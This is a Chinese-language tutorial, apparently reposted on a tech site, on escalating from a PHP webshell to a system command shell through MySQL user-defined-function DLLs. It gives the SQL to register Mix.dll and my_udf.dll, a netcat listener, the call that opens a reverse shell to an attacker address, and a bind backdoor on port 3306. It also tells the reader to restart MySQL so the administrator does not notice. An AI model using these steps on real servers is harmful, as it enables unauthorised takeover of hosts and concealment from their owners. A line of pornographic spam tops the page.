自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

WEBSHELL提升權(quán)限又一招(Mysql漏洞)

安全 漏洞
S-serv提權(quán)方式人人都會(huì)用了,搞得目前的主機(jī)都設(shè)置得非常安全,看來攻擊手法的層出不窮也是造成中國(guó)網(wǎng)絡(luò)安全進(jìn)步的一大原因之一,更有其他的pcanywhere獲取密碼,替換服務(wù),等等。不過目前也沒這么好搞了,隨著安全意識(shí)的提高,之前的方式估計(jì)不怎么管用,目前本文給大家介紹一下一種新的提權(quán)方式。

MYSQLl弱口令可以拿到系統(tǒng)權(quán)限,在WEBSHEL上也可實(shí)現(xiàn),不過有個(gè)前提,就是目標(biāo)主機(jī)裝有MYSQL,而你又知道MYSQL的用戶和密碼,才能進(jìn)行提權(quán)。WEBSHELL獲得了,找用戶和密碼也不是什么難事。目前我拿我另外一臺(tái)機(jī)器做示范,已把PHPSHELL傳上去了,如圖1

WEBSHELL提升權(quán)限又一招(Mysql漏洞)

一般來說連接MYSQL的帳戶密碼非常好找,隨便編輯一個(gè)PHP文件,就看到了。如圖2

WEBSHELL提升權(quán)限又一招(Mysql漏洞)

看到了吧,用戶名:root 密碼:123456 庫(kù)名:php 然后怎么辦呢?先用SQL Query 建立連接,如圖3

WEBSHELL提升權(quán)限又一招(Mysql漏洞)

連接成功了,目前開始將我們的提權(quán)用滴東東:Mix.dll My_udf.dll上傳上去先.OK,傳好了,Mix.dll用于反彈連接,My_udf.dll是正向連接,直接用連接對(duì)方的3306端口然后輸入密碼就可獲得CMDSHELL。好,不多說了,傳上去之后呢就執(zhí)行以下SQL語(yǔ)句create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll'; 來注冊(cè)函數(shù).

出現(xiàn)SQL語(yǔ)句成功執(zhí)行!如圖4

WEBSHELL提升權(quán)限又一招(Mysql漏洞)

 

離拿到CMDSHELL已不遠(yuǎn)了,我們先用NC在本地監(jiān)聽一個(gè)端口先,Nc -l -p 1234 (這個(gè)我想不用截圖了吧)而后執(zhí)行語(yǔ)句:select Mixconnect('192.168.1.254','1234'); 來激活那個(gè)函數(shù),如圖5

WEBSHELL提升權(quán)限又一招(Mysql漏洞)

執(zhí)行成功,然后看看我們的NC有反映沒,如圖6

WEBSHELL提升權(quán)限又一招(Mysql漏洞) 

成功得到CMSHELL,不過這時(shí)對(duì)方的MYSQL已假死咯,我們要把MYSQL服務(wù)進(jìn)程給kill掉,然后重新啟動(dòng)MYSQL服務(wù)才行,不然管理員發(fā)現(xiàn)網(wǎng)站運(yùn)行不了了,那就。。。。如果該服務(wù)器不允許連接所有外部IP和端口,而他的3306端口卻是對(duì)外開的!這時(shí)My_udf.dll就該上場(chǎng)了,使用方法和Mix相同,連接MYSQL成功后執(zhí)行如下語(yǔ)句:create function my_udfdoor returns string soname 'D:\\php\\php\my_udf.dll'; 執(zhí)行語(yǔ)句成功后,然后我們就開始激活這個(gè)函數(shù),輸入語(yǔ)句:select my_udfdoor (''); 然后用nc連接3306端口,然后輸入f**k 就能得到一個(gè)cmdshell了如圖7

WEBSHELL提升權(quán)限又一招(Mysql漏洞)

測(cè)試結(jié)束 

WEBSHELL提升權(quán)限的技巧(Mysql漏洞)大家應(yīng)該掌握了,希望大家多多了解這方面的知識(shí)。

【編輯推薦】

  1. 詳細(xì)解析數(shù)據(jù)加密
  2. 內(nèi)部網(wǎng)中的密碼管理
  3. 探討ECC加密被破譯的可能性
  4. 信息安全的核心之密碼技術(shù) 上
  5. 密碼遺忘通關(guān)手冊(cè) 為你減少不必要的麻煩 上
責(zé)任編輯:佚名 來源: 網(wǎng)絡(luò)轉(zhuǎn)載
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)